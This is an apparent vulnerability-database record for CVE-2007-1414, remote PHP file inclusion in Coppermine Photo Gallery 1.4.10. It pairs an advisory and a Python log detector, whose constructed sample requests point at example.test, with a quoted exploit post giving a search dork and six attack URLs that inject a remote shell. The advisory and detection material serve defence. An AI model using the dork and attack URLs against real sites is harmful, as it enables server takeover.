Coppermine Photo Gallery Multiple Remote File Inclusion Vulnerabilities

Vulnerability ID: 1191353    Vulnerability type: Input validation
Published: 2007-03-09    Updated: 2007-05-31
CVE: CVE-2007-1414    CNNVD ID: CNNVD-200703-340
Platform: N/A    CVSS score: 10.0
|Sources
https://www.securityfocus.com/bid/22896
https://cxsecurity.com/issue/WLB-2007030114
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-340
|Details
Coppermine Photo Gallery (CPG) contains multiple PHP remote file inclusion vulnerabilities. A remote attacker can execute arbitrary PHP code by supplying a URL in the cmd parameter of (a) image_processor.php or (b) picmgmt.inc.php, or in the path parameter of (c) include/functions.php, (d) include/plugin_api.inc.php, (e) index.php, or (f) pluginmgr.php.
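A log-side check for the pattern the description gives (the six scripts and their cmd/path parameters carrying a remote URL), as an added example that is not part of this record or of Coppermine's code; the access-log lines, client addresses and the example.test host are constructed, and the check also catches URL-encoded and double-encoded scheme prefixes.

```python
"""Flag access-log requests that fit the CVE-2007-1414 pattern: one of the six
Coppermine scripts receiving a remote URL in its 'cmd' or 'path' parameter."""
import re
from urllib.parse import parse_qs, unquote, urlsplit
# Script basename -> parameter the advisory says reaches include() unsanitised.
VULN_PARAMS = {
    "image_processor.php": "cmd",
    "picmgmt.inc.php": "cmd",
    "functions.php": "path",
    "plugin_api.inc.php": "path",
    "index.php": "path",
    "pluginmgr.php": "path",
}
# Values that would make PHP's include() fetch code from outside the webroot.
REMOTE_SCHEME = re.compile(r"^\s*(https?|ftps?|php|data|expect)://", re.I)
# Combined log format: client, ident, user, [time], "METHOD target PROTO", status.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify_request(request_target):
    """Return (script, param, decoded_value) when the request targets a
    vulnerable script with a remote-looking include value, else None."""
    parts = urlsplit(request_target)
    script = parts.path.rsplit("/", 1)[-1]
    param = VULN_PARAMS.get(script)
    if param is None:
        return None
    for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
        # parse_qs decodes once; decode again to catch double-encoded schemes.
        decoded = unquote(unquote(value))
        if REMOTE_SCHEME.match(decoded):
            return script, param, decoded
    return None

def scan_log(lines):
    """Return a list of (client, script, param, value) for suspicious requests."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m and (found := classify_request(m.group(3))):
            hits.append((m.group(1),) + found)
    return hits

# Constructed sample log lines (not real traffic); RFC 5737 test addresses.
SAMPLE_LOG = [
    '198.51.100.7 - - [09/Mar/2007:10:01:02 +0000] "GET /cpg/index.php?path=http://example.test/s.txt HTTP/1.1" 200 512',
    '198.51.100.7 - - [09/Mar/2007:10:01:05 +0000] "GET /cpg/include/functions.php?path=http%3A%2F%2Fexample.test%2Fs.txt HTTP/1.1" 200 512',
    '203.0.113.9 - - [09/Mar/2007:10:02:00 +0000] "GET /cpg/image_processor.php?cmd=rotate HTTP/1.1" 200 1024',
    '192.0.2.5 - - [09/Mar/2007:10:03:00 +0000] "GET /cpg/include/picmgmt.inc.php?cmd=https%253A%252F%252Fexample.test%252Fs.txt HTTP/1.1" 200 100',
]
```

The same request shape is what a WAF rule or IDS signature for this CVE keys on; on the PHP side, a remote include only succeeds when allow_url_fopen (and, from PHP 5.2, allow_url_include) is enabled, so disabling those closes the remote-fetch path independently of the application fix.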
|Exploit
By Hasadya Raed
Contact : RaeD (at) BsdMail (dot) Com [email concealed]
------------------------------------
Script : Coppermine Photo Gallery
Expl : Remote Include File 
Dork : "Copyright (c) 2003-2006 Coppermine Dev Team"
------------------------------------
B.Files :
image_processor.php
functions.php
picmgmt.inc.php
plugin_api.inc.php
index.php

Exploits :

http://www.Victim.Com/Script_Path/image_processor.php?cmd=[Shell-Attack]

http://www.Victim.Com/Script_Path/include/functions.php?path=[Shell-Attack]
http://www.Victim.Com/Script_Path/include/picmgmt.inc.php?cmd=[Shell-Attack]
http://www.Victim.Com/Script_Path/include/plugin_api.inc.php?path=[Shell-Attack]
http://www.Victim.Com/Script_Path/index.php?path=[Shell-Attack]
http://www.Victim.Com/Script_Path/pluginmgr.php?path=[Shell-Attack]

----------------------------------------

By Hasadya Raed

|Affected products
Coppermine Photo Gallery 1.4.10
|References

Source: XF    Name: coppermine-multiple-scripts-file-include(32894)    Link: http://xforce.iss.net/xforce/xfdb/32894
Source: BID    Name: 22896    Link: http://www.securityfocus.com/bid/22896
Source: BUGTRAQ    Name: 20070309RemoteFileIncludeInScriptCopperminePhotoGallery    Link: http://www.securityfocus.com/archive/1/archive/1/462322/100/0/threaded
Source: BUGTRAQ    Name: 20070322RemoteFileIncludeInCopperminePhotoGallery    Link: http://www.securityfocus.com/archive/1/archive/1/463532/100/0/threaded
Source: OSVDB    Name: 35070    Link: http://www.osvdb.org/35070
Source: OSVDB    Name: 35069    Link: http://www.osvdb.org/35069
Source: OSVDB    Name: 35068    Link: http://www.osvdb.org/35068
Source: OSVDB    Name: 35067    Link: http://www.osvdb.org/35067
Source: OSVDB    Name: 35066    Link: http://www.osvdb.org/35066
Source: OSVDB    Name: 35065    Link: http://www.osvdb.org/35065
Source: SREASON    Name: 2416    Link: http://securityreason.com/securityalert/2416